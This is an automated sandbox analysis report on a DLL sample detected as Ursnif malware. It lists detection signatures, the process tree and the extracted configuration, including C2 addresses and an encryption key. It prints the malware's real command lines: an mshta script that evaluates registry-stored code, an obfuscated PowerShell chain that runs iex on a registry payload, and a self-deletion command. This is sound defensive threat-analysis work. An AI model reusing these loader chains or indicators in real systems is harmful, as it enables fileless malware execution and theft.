Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HxEWwh74qT

Overview

General Information

Sample Name:HxEWwh74qT (renamed file extension from none to dll)
Analysis ID:613862
MD5:5d2b5cbd8a574c9e35309e21ecf93a0e
SHA1:c15e583e28556f5d187197937b4d2a715ebf8ca7
SHA256:52d14c9cd56aa41ba98a24a4a3dc3674f7e281c3d79f6aca141382fb56585bcd
Tags:32dllexe
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7080 cmdline: loaddll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 7124 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7148 cmdline: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6020 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • WerFault.exe (PID: 3380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 612 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6304 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6024 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6432 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 900 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5516 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3808 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 3904 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6948 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4184 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6652 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8,  *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 24 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.4de0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              3.3.rundll32.exe.5456940.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.3.rundll32.exe.53aa4a0.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  3.3.rundll32.exe.53aa4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.4c794a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 3 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Windows Shell File Write to Suspicious Folder
                      Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 6304, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
                      Sigma detected: Accessing WinAPI in PowerShell. Code Injection
                      Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6932, StartAddress: DBEB1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3808
                      Sigma detected: Suspicious Remote Thread Created
                      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6932, StartAddress: DBEB1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3808
                      Sigma detected: MSHTA Spawning Windows Shell
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6932, ProcessName: powershell.exe
                      Sigma detected: Suspicious Call by Ordinal
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7124, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, ProcessId: 7148, ProcessName: rundll32.exe
                      Sigma detected: Mshta Spawning Windows Shell
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6932, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6932, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline, ProcessId: 6024, ProcessName: csc.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6932, TargetFilename: C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline
                      Source: Process startedAuthor: frack113: Data: Command: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", CommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3808, ParentProcessName: explorer.exe, ProcessCommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", ProcessId: 6652, ProcessName: cmd.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value ie